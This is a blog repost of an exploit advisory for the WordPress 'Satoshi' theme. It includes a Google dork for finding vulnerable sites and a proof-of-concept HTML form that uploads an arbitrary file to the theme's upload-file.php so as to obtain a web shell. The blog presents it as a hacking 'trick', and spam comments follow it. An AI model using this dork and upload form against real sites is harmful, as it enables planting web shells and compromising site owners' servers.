Satoshi Theme - File Upload CSRF



#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================


Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352
Miscellaneous

Submitter Anonymous
Views 750
Verified No
WPVDB ID 7709

-- Proof Of Concept --

When vuln : -

CSRF : 


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Succes  : Succes

Shell Path : Here

Kami update trik tutorial setiap hari, Jangan Sampai Terlewatkan :>
Partnership with Sereinly.com

2 Responses to "Satoshi Theme - File Upload CSRF"

  1. HTML Pro Team has got an extensive expertise in PSD To Joomla Theme Conversion with the ability to work on Joomla plug-in development and customization, Shopping Cart Plug-ins, Commercial Plug-in Implementations, Display Compatibility and Schema with Load Page Speed Optimization and all you can think a Joomla based site can do. If you’re looking to build a Joomla website in a hurry/jiffy and effortlessly – our experts will slice your PSD into HTML then code a Joomla theme for your next project with 100% satisfaction!

    BalasHapus
  2. A brothel in Cologne, Germany is offering any patron who gets a tattoo of the businesses logo, by their in house artist, free entrance for life ($6.25 US) and discounts on lap dances ($25.00 US. ea)
    kit tattoo

    BalasHapus

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel